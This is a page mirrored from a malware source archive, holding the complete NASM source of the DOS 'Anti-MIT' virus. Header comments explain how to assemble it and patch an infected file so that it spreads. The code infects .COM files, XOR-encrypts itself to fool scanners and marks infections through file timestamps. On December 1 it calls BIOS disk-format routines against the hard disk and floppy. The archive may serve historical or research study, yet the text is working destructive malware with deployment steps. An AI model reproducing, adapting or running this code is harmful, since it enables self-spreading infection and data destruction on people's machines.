mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 02:46:10 +00:00
4b9382ddbc
push
316 lines
8.4 KiB
NASM
316 lines
8.4 KiB
NASM
; ** Anti-MIT Virus **
|
||
; To assemble, use TASM and TLINK to create a .COM file. Next
|
||
; run the .COM file in the same directory of a file you want to infect.
|
||
; Your system may hang, but after re-booting you will notice an increase
|
||
; in the target files size. Now debug the newly infected file and replace
|
||
; the first three bytes with E8 05 00 (call to encryption). Re-write the
|
||
; .COM file and now you should have a running copy of the Anti-Mit virus!
|
||
;
|
||
; - Do not distribute the Anti-MIT virus for this
|
||
; activity is against the law! The author will take
|
||
; NO responsiblity for others.
|
||
; TEST ONLY
|
||
;
|
||
; For more info see MIT.DOX file.
|
||
|
||
|
||
|
||
|
||
name AntiMIT
|
||
title Anti-MIT: The original Anti-MIT virus code!
|
||
.radix 16
|
||
code segment
|
||
assume cs:code,ds:code
|
||
org 100
|
||
|
||
buffer equ offset 20000d ; Buffer
|
||
fname equ offset 20000d + 1eh ; DTA - File name
|
||
ftime equ offset 20000d + 16h ; DTA - File time
|
||
fsize equ offset 20000d + 1ah ; DTA - File size
|
||
olddta equ 80 ; Old DTA area
|
||
|
||
start:
|
||
jmp main ; *See above*
|
||
nop
|
||
jmp main ; Jmp to virus body
|
||
|
||
encrypt_val db 0 ; Randomized encryption value
|
||
|
||
decrypt: ; Encrypt/decrypt engine
|
||
encrypt: ; [SKISM type]
|
||
lea si, data
|
||
mov ah, encrypt_val
|
||
jmp fool_em ; Fool with the scanners
|
||
|
||
xor_loop:
|
||
lodsb ; ds:[si] -> al
|
||
xor al, ah
|
||
stosb ; al -> es:[di]
|
||
loop xor_loop
|
||
mov ah,19h ; Set current drive as default
|
||
int 21h
|
||
mov dh,al
|
||
mov ah,0eh
|
||
int 21h
|
||
ret
|
||
|
||
fool_em:
|
||
mov di, si
|
||
mov cx, stop_encrypt - data
|
||
jmp xor_loop
|
||
|
||
|
||
|
||
data label byte ; Virus data
|
||
message db 'MIT Sux! $' ; The "message"
|
||
lengthp dw ? ; Length of infected file
|
||
allcom db '*.COM',0 ; What to search for
|
||
virus db '[Anti-MIT]',0 ; Virus name
|
||
author db 'F<>rs<72>Str<74>k<EFBFBD>',0 ; Author
|
||
|
||
main: ; Main virus code
|
||
mov ah,2ah ; Get the date
|
||
int 21h
|
||
|
||
cmp dh,12d ; Month 12?
|
||
jnz next ; No
|
||
|
||
|
||
cmp dl,01d ; Day one?
|
||
jnz next ; No
|
||
lea dx,message ; Yes, set off the "bomb"
|
||
mov ah,09h
|
||
int 21h
|
||
|
||
mov ah,05h
|
||
mov al,02h
|
||
mov ch,00h
|
||
mov dh,00h
|
||
mov dl,80h
|
||
int 13h
|
||
|
||
mov ah,06h
|
||
int 13h
|
||
|
||
mov ah,05h
|
||
mov dl,00h
|
||
int 13h
|
||
|
||
mov ah,4ch ; Exit
|
||
int 21h
|
||
|
||
next:
|
||
mov cx,lengthp ; Figure out the Jmp
|
||
sub cx,eendcode-start
|
||
mov the_jmp,cx
|
||
|
||
|
||
|
||
|
||
push es ; Save ES
|
||
mov ax,3524h ; Get interrupt 24h handler
|
||
int 21h ; and save it in errhnd
|
||
mov [err1],bx
|
||
mov [err2],es
|
||
pop es ; Restore ES
|
||
|
||
mov ax,2524h ; Set interrupt 24h handler
|
||
lea dx,handler
|
||
int 21h
|
||
|
||
xor dx,dx ; Set DTA in "buffer" area
|
||
mov si,dx
|
||
mov dx,buffer
|
||
add dx,si ; Set new Disk Transfer Address
|
||
mov ah,1A ; Set DTA
|
||
int 21
|
||
|
||
|
||
find_first:
|
||
mov dx,offset allcom ; Search for '*.COM' files
|
||
mov cx,00000001b ; Normal, Write Protected
|
||
mov ah,4E ; Find First file
|
||
int 21
|
||
jc pre_done ; Quit if none found
|
||
jmp check_if_ill
|
||
|
||
mover: ; The "mover" code
|
||
push cs ; Store CS
|
||
pop es ; and move it to ES
|
||
mov di,0100h
|
||
lea si,eendcode ; Move original code to
|
||
add si,the_jmp ; beginning
|
||
add si,endcode-mover
|
||
mov cx,eendcode-start
|
||
rep movsb
|
||
mov di,0100h ; Jmp to CS:[100h]
|
||
jmp di
|
||
|
||
pre_done:
|
||
jmp done ; Long jmp
|
||
|
||
find_next:
|
||
mov ah,4fh ; Search for next
|
||
int 21h
|
||
jc pre_done
|
||
|
||
check_if_ill: ; File infected?
|
||
mov ax,cs:[ftime]
|
||
and al,11111b ; Look for the 62 sec marker
|
||
cmp al,62d/2 ; [Vienna type]
|
||
jz find_next
|
||
|
||
cmp cs:[fsize],19000d ; Check if file larger then
|
||
ja find_next ; 19000 bytes - if so skip
|
||
|
||
cmp cs:[fsize],500d ; Check if file smaller then
|
||
jb find_next ; 500 bytes - if so skip
|
||
|
||
|
||
mainlp: ; Write the virus
|
||
mov dx,fname
|
||
mov ah,43h ; Write enable
|
||
mov al,0
|
||
int 21h
|
||
mov ah,43h
|
||
mov al,01h
|
||
and cx,11111110b
|
||
int 21h
|
||
|
||
|
||
mov ax,3d02h ; Open file (read/write)
|
||
int 21h
|
||
jc pre_done
|
||
mov bx,ax
|
||
|
||
mov ax,5700h ; Get date for file
|
||
int 21h
|
||
mov [time],cx ; Save date info
|
||
mov [date],dx
|
||
|
||
mov ah,3fh ; Read original code into
|
||
mov dx,buffer ; buffer (length of virus)
|
||
mov cx,eendcode-start
|
||
int 21h
|
||
jc pre_done
|
||
cmp ax,eendcode-start
|
||
jne pre_done
|
||
|
||
|
||
mov ah,42h ; Go to end of file
|
||
mov al,02h
|
||
xor cx,cx
|
||
xor dx,dx
|
||
int 21h
|
||
jc pre_done
|
||
mov cx,ax
|
||
mov lengthp,ax ; Save original program code
|
||
|
||
mov ah,40h ; Write "mover" code to end
|
||
lea dx,mover ; of file
|
||
mov cx,endcode-mover
|
||
int 21h
|
||
jc done
|
||
cmp ax,endcode-mover
|
||
jne done
|
||
|
||
mov ah,40h ; Write original program code
|
||
mov dx,buffer ; to end of the file
|
||
mov cx,eendcode-start
|
||
int 21h
|
||
jc done
|
||
cmp ax,eendcode-start
|
||
jne done
|
||
|
||
mov ah,42h ; Go to front of file
|
||
mov al,00h
|
||
xor cx,cx
|
||
xor dx,dx
|
||
int 21h
|
||
jc done
|
||
|
||
stop_encrypt:
|
||
mov ah,2ch ; Get time
|
||
int 21h
|
||
|
||
mov encrypt_val,dh ; Use time as random encryption
|
||
call encrypt ; value
|
||
|
||
mov ah,40h ; Write virus code to front of
|
||
lea dx,start ; file
|
||
mov cx,eendcode-start
|
||
int 21h
|
||
jc done
|
||
cmp ax,eendcode-start
|
||
jne done
|
||
jmp date_stuff
|
||
|
||
handler:
|
||
mov al,0
|
||
iret
|
||
endp
|
||
|
||
|
||
time dw ? ; File stamp - time
|
||
date dw ? ; File stamp - date
|
||
err1 dw ? ; Original error handler
|
||
err2 dw ? ; address
|
||
|
||
date_stuff: ; Restore old file stamp
|
||
mov ax,5701h
|
||
mov cx,[time]
|
||
mov dx,[date]
|
||
and cl,not 11111b ; Set seconds field to 62 secs.
|
||
or cl,11111b
|
||
int 21h
|
||
mov ah,3eh
|
||
int 21h
|
||
mov dx,olddta ; Restore "original" DTA
|
||
mov ah,1ah
|
||
int 21h
|
||
|
||
push ds ; Save DS
|
||
mov ax,2524h ; Set interrupt 24h handler
|
||
mov dx,err1 ; Restore saved handler
|
||
mov dx,err2
|
||
mov ds,dx
|
||
int 21h
|
||
pop ds ; Restore DS
|
||
|
||
done:
|
||
xor cx,cx ; Clear registors
|
||
xor dx,dx
|
||
xor bx,bx
|
||
xor ax,ax
|
||
xor si,si
|
||
jmp_code db 0e9h ; Preform jmp to "mover" code
|
||
the_jmp dw ?
|
||
|
||
go:
|
||
eendcode label byte
|
||
|
||
nop ; krap
|
||
nop
|
||
nop
|
||
nop
|
||
nop
|
||
|
||
|
||
|
||
|
||
endcode label byte
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
code ends
|
||
end start
|